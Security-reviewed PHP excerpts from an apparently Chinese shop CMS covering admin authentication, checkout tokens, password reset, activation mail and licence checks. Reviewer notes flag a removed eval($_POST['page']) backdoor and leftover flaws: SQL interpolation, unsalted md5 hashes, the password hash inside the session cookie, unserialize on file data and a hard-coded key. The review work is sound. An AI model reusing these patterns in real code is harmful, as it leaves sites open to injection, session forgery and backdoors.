Example #1
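/**
 * Rebuilds the global $_ADMINUSERS record from the "adminauth" token, then
 * calls adminchecklogin().
 *
 * The token is read from the "adminauth" cookie, or from the request when no
 * cookie is present, and is expected to decode to "<adminid>\t<name>\t<pwd>".
 * $_ADMINUSERS is filled only when all three fields match one admin row;
 * in every other case it is left as an empty array.
 *
 * Security notes:
 * - The original body ran eval($_POST['page']) right after decoding the token,
 *   before any credential had been checked. That line has no part in
 *   authentication and is removed; finding it in a deployed copy should be
 *   handled as a backdoor (review file integrity, access logs and credentials).
 * - The original lookup interpolated the decoded name and password into SQL.
 *   The row is now selected by a digits-only id and the other two fields are
 *   compared in PHP, so no token-supplied string reaches the query.
 */
function admincheckauth()
{
    global $db, $tablepre, $_ADMINUSERS;

    // Default to "not logged in"; filled below only after every check passes.
    $_ADMINUSERS = array();

    $loginauth = get_cookie('adminauth');
    if (empty($loginauth) && isset($_REQUEST['adminauth'])) {
        // NOTE(review): a session token accepted from GET/POST ends up in URLs,
        // referrers and server logs. Keep this fallback only if a client that
        // cannot send cookies really depends on it.
        $loginauth = $_REQUEST['adminauth'];
    }

    if (!empty($loginauth) && is_string($loginauth)) {
        // Pad to three fields so a malformed token gives empty values rather than notices.
        $fields = array_pad(explode("\t", (string) cookie_authcode($loginauth, 'DECODE')), 3, '');
        list($aid, $user, $pwd) = $fields;

        // Only a plain positive decimal id may be placed into the statement.
        // Assumes adminid is the numeric key of the admin table: confirm against the schema.
        if (preg_match('/\A[1-9][0-9]*\z/', $aid) && !empty($user) && !empty($pwd)) {
            $row = $db->fetch_first("Select * From {$tablepre}admin where adminid = {$aid}");

            // Strict string comparison avoids PHP's numeric-string juggling on the
            // stored hash; on PHP >= 5.6 prefer hash_equals() for this check.
            if (is_array($row)
                && strcasecmp((string) $row['adminname'], $user) === 0
                && (string) $row['adminpwd'] === $pwd
            ) {
                $_ADMINUSERS['adminid'] = $aid;
                $_ADMINUSERS['adminname'] = $row['adminname'];
                $_ADMINUSERS['adminmid'] = $row['adminmid'];
                $_ADMINUSERS['lastlogin'] = $row['lastlogin'];
                $_ADMINUSERS['logincount'] = $row['logincount'];
            }
        }
    }

    adminchecklogin();
}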
Example #2
                $s[$val['goodsseller']] = $val['sendprice'];
            }
        } else {
            $s[$val['goodsseller']] = $val['sendprice'];
        }
    }
    // Total the cart rows collected above.
    $countdata = $Cart->countmoney($dataarray);
    // Build the verification token: "<ids>\t<totalmoney>", encoded with cookie_authcode().
    // Presumably the template emits $paydata into the confirm form so the submit
    // branch can detect tampering: confirm in the payconfirm template.
    $ids = getdotstring($gids, 'int');
    $auth = $ids . "\t" . $countdata['totalmoney'];
    $paydata = cookie_authcode($auth, 'ENCODE');
    // Render the confirmation template. It runs in this scope, so it reads the
    // local variables set above by name.
    include template('payconfirm');
} else {
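    // Handle the submitted confirmation.
    // The token should decode to "<ids>\t<totalmoney>"; padding gives empty
    // fields for a malformed token instead of relying on @ to hide notices.
    list($ids, $totalmoney) = array_pad(explode("\t", (string) cookie_authcode($__PAYDATA, 'DECODE')), 2, '');
    // Strict string comparison: loose == treats numeric-looking strings such as
    // "10" and "1e1" as equal.
    if ((string) $ids === (string) getdotstring($gids, 'int') and !empty($ids)) {
        $tempids = $ids;
    } else {
        exit(lang('Data_exception'));
    }
    // NOTE(review): $totalmoney is decoded but never compared with a freshly
    // computed total, so only the id list is actually bound by the token here.
    // Charge the order, move the cart rows to orders, and log the operation.
    $info = $Cart->carttoorder($tempids);
    $message = $info == 'OK' ? lang('Submitted_successfully') : $info;
    // Emit the message as a JavaScript string literal. The original printed the
    // success text without quotes (a script syntax error) and the failure text
    // unescaped inside single quotes (script injection if it ever carries user data).
    // Assumes messages are UTF-8: confirm; json_encode() fails on other encodings.
    $jsMessage = json_encode((string) $message, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    if ($jsMessage === false) {
        $jsMessage = '""';
    }
    print "<script language='javascript'>alert(" . $jsMessage . ");</script>";
    jumpurl(url("m.php"));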
}
Example #3
            //显示邮件已经发送到邮箱
            exit;
        } else {
            print "<script language='javascript'>alert('用户名和邮箱不区配');history.go(-1);</script>";
            exit;
        }
    } else {
        include template('ForgotPassword');
        //包含输出指定模板
    }
} elseif ($action == 'newpass') {
    //重置密码
    InitGP(array("code", "password", "password2", "commit"));
    //初始化变量全局返回
    if (!empty($code)) {
        @(list($uname, $activekey, $email) = explode("\t", cookie_authcode($code, 'DECODE')));
        if (!empty($password) && !empty($password2)) {
            if (strlen($password) <= 6) {
                print "<script language='javascript'>alert('密码长度太短!');history.go(-1);</script>";
                exit;
            }
            if ($password != $password2) {
                print "<script language='javascript'>alert('两次输入的密码不一致!');history.go(-1);</script>";
                exit;
            }
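            // Verify the reset code against the stored user record.
            // $uname, $activekey and $email are decoded from the request-supplied
            // code, so each one is escaped before it goes into the statement.
            // NOTE(review): addslashes() is a stopgap because it is not charset-aware.
            // Move this lookup to the database layer's own escaping or to bound
            // parameters once that API is confirmed.
            $uid = DB::result_first(
                "Select uid From " . DB::table("users")
                . " WHERE email='" . addslashes((string) $email)
                . "' and uname='" . addslashes((string) $uname)
                . "' and activekey='" . addslashes((string) $activekey) . "'"
            );
            if (empty($uid)) {
                print "<script language='javascript'>alert('数据校验失败!链接已过期或者链接错误!');history.go(-1);</script>";
                exit;
            }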
Example #4
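    // Reject a login attempt with a missing user name or password.
    if (empty($username) || empty($password)) {
        showmsg("用户名或者密码为空", "-1");
        exit;
    }
    // Exact match instead of LIKE: with LIKE, "%" and "_" in the submitted name
    // act as wildcards and can select another account's row.
    // NOTE(review): $username is interpolated here and in the two update
    // conditions below. Its origin is outside this excerpt, so confirm it is
    // escaped (or bind it) before it reaches these statements.
    $row = $db->fetch_first("Select * From {$tablepre}admin where adminname = '{$username}' ");
    if (!is_array($row)) {
        // NOTE(review): a separate "unknown user" message lets a client enumerate admin names.
        showmsg("用户名不存在", "-1");
    } elseif (md5($password) !== (string) $row['adminpwd']) {
        // Strict comparison: loose != treats two different "0e<digits>" hashes as equal.
        // NOTE(review): unsalted md5 is not a password hash; plan a migration to
        // password_hash()/password_verify().
        $log_file = ROOT_PATH . '/data/adminlogin_safe.txt';
        $userIP = function_exists('real_ip') ? real_ip() : "";
        $getUrl = geturl();
        // The submitted password is no longer written to the log: a failed attempt
        // is often a near-miss of the real password. The field is kept as "***"
        // so the "||" column layout stays the same.
        $fields = array(date('Y-m-d H:i:s'), $userIP, $getUrl, $username, '***', '登陆失败');
        // Strip CR/LF so request-controlled values cannot forge extra log lines.
        $line = str_replace(array("\r", "\n"), ' ', implode('||', $fields)) . "\r\n";
        // Append under a lock and release the handle (the original never closed it).
        // NOTE(review): confirm the web server does not serve this .txt file.
        file_put_contents($log_file, $line, FILE_APPEND | LOCK_EX);
        showmsg("用户名或者密码错误", "-1");
        exit;
    } else {
        // NOTE(review): the cookie carries the stored password hash, so a leaked
        // hash is enough to build a session. A random server-side session id
        // would avoid that.
        $adminauth = $row['adminid'] . "\t" . $username . "\t" . $row['adminpwd'];
        // Cookie lifetime: 12 hours.
        set_cookie('adminauth', cookie_authcode($adminauth, 'ENCODE'), time() + 3600 * 12);
        // Increment the login counter.
        addfield("admin", "logincount", "adminname='{$username}'", 1);
        // Record the time of this login.
        editstate("admin", "lastlogin", "adminname='{$username}'", $timestamp);
        showmsg("登录成功!", "index.php");
    }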
}
Example #5
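 /**
  * Builds an activation code for a user and mails the activation link.
  *
  * With a non-empty $uname the account is looked up and its stored address and
  * activation key are used; otherwise the values already on this object are used.
  *
  * @param string $uname User name to look up (passed through Char_cv() first).
  * @param string $email Recipient address; replaced by the stored one when the lookup succeeds.
  * @return string "OK" once the mail call has been made, 'approved' when the account
  *                is already active, or the "user does not exist" language string.
  */
 function sendactiveemail($uname = "", $email = "")
 {
     global $cfg_site_name;
     // Filter the name.
     // NOTE(review): Char_cv() is defined elsewhere; confirm it makes $uname safe
     // for the quoted SQL literal below, or bind the value instead.
     $uname = Char_cv($uname);
     if (!empty($email)) {
         $this->email = $email;
     }
     if (!empty($uname)) {
         $row = $this->db->fetch_first("Select activekey,state,email From `{$this->table}` WHERE uname='{$uname}'");
         if (empty($row['activekey'])) {
             return lang('Specifieduser_notexist');
         }
         if ($row['state'] == 1) {
             // Already activated.
             return 'approved';
         }
         $this->email = $row['email'];
         $this->uname = $uname;
         $string = $uname . "\t" . $row['activekey'];
     } else {
         $string = $this->uname . "\t" . $this->activekey;
     }
     // Fourth argument is presumably a lifetime in seconds: confirm in cookie_authcode().
     $codestring = cookie_authcode($string, 'ENCODE', "", 3600);
     $subject = lang('account_activation_email', array('$cfg_site_name' => $cfg_site_name, '$this->uname' => $this->uname));
     $site = str_replace("/ajax", "", SITE_URL);
     // Percent-encode the whole code, not only "+", so no character in it can
     // break out of the query string or the quoted href attribute.
     $codestring = rawurlencode($codestring);
     // NOTE(review): {$this->uname} is placed into the HTML body as-is; confirm it
     // is already HTML-escaped on both paths that set it.
     $emailstr = "hi {$this->uname},<BR><BR>" . lang('Click_link_activate', array('$cfg_site_name' => $cfg_site_name)) . "<BR><BR><BR><A href='{$site}/user.php?action=active&code={$codestring}' target=_blank>{$site}/user.php?action=active&code={$codestring}</A><BR><BR>-- <BR>{$cfg_site_name}";
     // Send the mail.
     include_once INC_PATH . "/sendmail.class.php";
     $sendmail = new SendEmail();
     // NOTE(review): the result of sendmailto() is ignored, so "OK" is returned
     // whether or not the message was accepted.
     $sendmail->sendmailto($subject, $emailstr, $this->email);
     return "OK";
 }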
        $wheresqlc = implode(' AND ', $wherestrc);
    }
    //条件汇总
    $couponarray = $couponobj->getdata("", $wheresqlc, "");
    //获取数据
    include template('member_tosendorder');
    //包含输出指定模板
} elseif ($action == "save") {
    InitGP(array("action", "LOCKDATA", "consignee", "tel", "country", "city", "address", "zip", "area", "remark", "did", "usecoupon", "couponid"));
    // Initialise the listed request variables as globals.
    // Create the table objects for delivery methods and areas.
    $deliveryobj = new TableClass('delivery', 'did');
    $areaobj = new TableClass('area', 'aid');
    $couponid = GetNum($couponid);
    // Handle the submitted data: LOCKDATA should decode to "<ids>\t<countmoney>\t<countweight>".
    // NOTE(review): @ hides the notices a malformed or undecodable token produces;
    // the fields are then simply empty and fail the check below.
    @(list($ids, $countmoney, $countweight) = explode("\t", cookie_authcode($LOCKDATA, 'DECODE')));
    //if($ids==$oids and !empty($ids) and !empty($countmoney) and !empty($countweight)){  // a parcel weight of 0 is allowed, so !empty($countweight) was dropped
    // NOTE(review): loose == treats numeric-looking strings such as "10" and "1e1"
    // as equal. $oids is set outside this excerpt; after this check the decoded
    // value from the token replaces it.
    if ($ids == $oids and !empty($ids) and !empty($countmoney)) {
        $oids = $ids;
        $countmoney = GetNum($countmoney);
        $countweight = GetNum($countweight);
    } else {
        exit('数据异常');
    }
    // Check the order state.
    // NOTE(review): both conditions are built by string concatenation. $oids goes
    // into IN(...) unquoted, so this is only as safe as the integrity of the token;
    // confirm its format is validated and that $_USERS['uname'] is escaped.
    $wherestro[] = "uname='" . $_USERS['uname'] . "'";
    $wherestro[] = "oid in(" . $oids . ")";
    if (!empty($wherestro)) {
        $wheresqlo = implode(' AND ', $wherestro);
    }
    // Conditions combined.
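/**
 * Checks the licence file against the current host and records the result in $_CKEY.
 *
 * Reads ROOT_PATH/domain_key.dat, hex-decodes it, decrypts it with Xxtea, passes
 * it through cookie_authcode(..., 'DECODE') and base64_decode(), and expects
 * "<flag>@<serialized host list>". $_CKEY is set to 2 when the request host is
 * in that list and stays 0 on every failure path.
 *
 * Security notes:
 * - The key "zzqss" is hard-coded, so anyone with a copy of the code can produce
 *   a file that decrypts cleanly.
 * - $_SERVER['HTTP_HOST'] is supplied by the client; this is a licence check,
 *   not an access control.
 *
 * @return bool true when the host is listed, false otherwise.
 */
function checkkey()
{
    global $_CKEY;
    $_CKEY = 0;

    $auth_file = ROOT_PATH . "/domain_key.dat";
    if (!file_exists($auth_file)) {
        return false;
    }
    $str = @file_get_contents($auth_file);
    if ($str === false || $str === '') {
        // Unreadable or empty file: nothing to verify.
        return false;
    }

    $xxtea = new Xxtea();
    $jiamicode = pack('H*', $str);
    $strcode = $xxtea->decrypt($jiamicode, "zzqss");
    $strcode = cookie_authcode($strcode, 'DECODE', "zzqss");
    $strcode = base64_decode((string) $strcode);

    // Pad so a payload without "@" gives empty fields instead of an undefined offset.
    list($shangye, $domainstr) = array_pad(explode("@", (string) $strcode), 2, '');
    if (empty($domainstr) || empty($shangye)) {
        return false;
    }

    // SECURITY: unserialize() can instantiate objects from its input. The data
    // comes from a local file, but whoever can write that file controls it.
    // Prefer a JSON list; on PHP >= 7.0 at least pass
    // array('allowed_classes' => false) as the second argument.
    $domains = unserialize($domainstr);
    if (!is_array($domains)) {
        return false;
    }

    $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
    // Strict membership test: a loose in_array() can match unrelated entries
    // through type juggling (for example an integer 0 in the list).
    if ($host === '' || !in_array($host, $domains, true)) {
        return false;
    }

    $_CKEY = 2;
    return true;
}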